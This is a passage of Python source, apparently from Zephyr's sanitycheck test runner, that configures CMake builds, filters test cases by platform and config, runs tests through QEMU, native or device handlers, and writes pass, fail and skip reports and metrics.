raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param testcase The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# Right now we only support building on Windows; running is still a work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory, otherwise this overlay
# would be passed to kconfig.py *twice* and kconfig.cmake would silently
# give that second copy precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
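# Illustrative sketch (assumed values, not from the original script): for a
# test with extra_configs ["CONFIG_FOO=y"] built with coverage enabled on a
# platform listed in coverage_platform, the generated
# <build_dir>/sanitycheck/testcase_extra.conf would contain roughly:
#
#   CONFIG_FOO=y
#   CONFIG_COVERAGE=y
#   CONFIG_COVERAGE_DUMP=y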
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
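# Minimal usage sketch (hypothetical objects, not part of the original flow):
#
#   instance = TestInstance(testcase, platform, "/tmp/sanity-out")
#   instance.check_build_or_run(build_only=False, enable_slow=False,
#                               device_testing=False, fixtures=[])
#   if instance.run:
#       ...  # hand the instance to a handler / ProjectBuilder
#
# `testcase` and `platform` are assumed to be previously constructed TestCase
# and Platform objects; the build directory becomes
# <outdir>/<platform.name>/<testcase.name>.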
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
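# Illustrative note (assumed semantics): filter_data merges the environment,
# the generated .config and the CMake cache, so a testcase filter such as
#
#   filter: CONFIG_SERIAL and ARCH == "arm"
#
# is evaluated by expr_parser.parse() against that dictionary (plus the
# devicetree, when a .dts.pre.tmp file exists); a False result marks the
# instance as filtered out.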
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
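# Minimal usage sketch of BoundedExecutor (illustrative only): submit() blocks
# once `bound` items are already queued on top of the running workers, which
# keeps the work queue from growing without limit.
#
#   with BoundedExecutor(bound=20, max_workers=4) as ex:
#       futures = [ex.submit(do_work, item) for item in items]
#
# `do_work` and `items` are placeholders for the caller's own task function
# and input list.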
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
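# Hedged example of a testcase.yaml fragment that the schema above would
# accept (names and values are illustrative, not taken from the tree):
#
#   tests:
#     kernel.mutex:
#       tags: kernel
#       harness: ztest
#       min_ram: 16
#       platform_whitelist: native_posix
#       extra_configs:
#         - CONFIG_DEBUG=y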
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
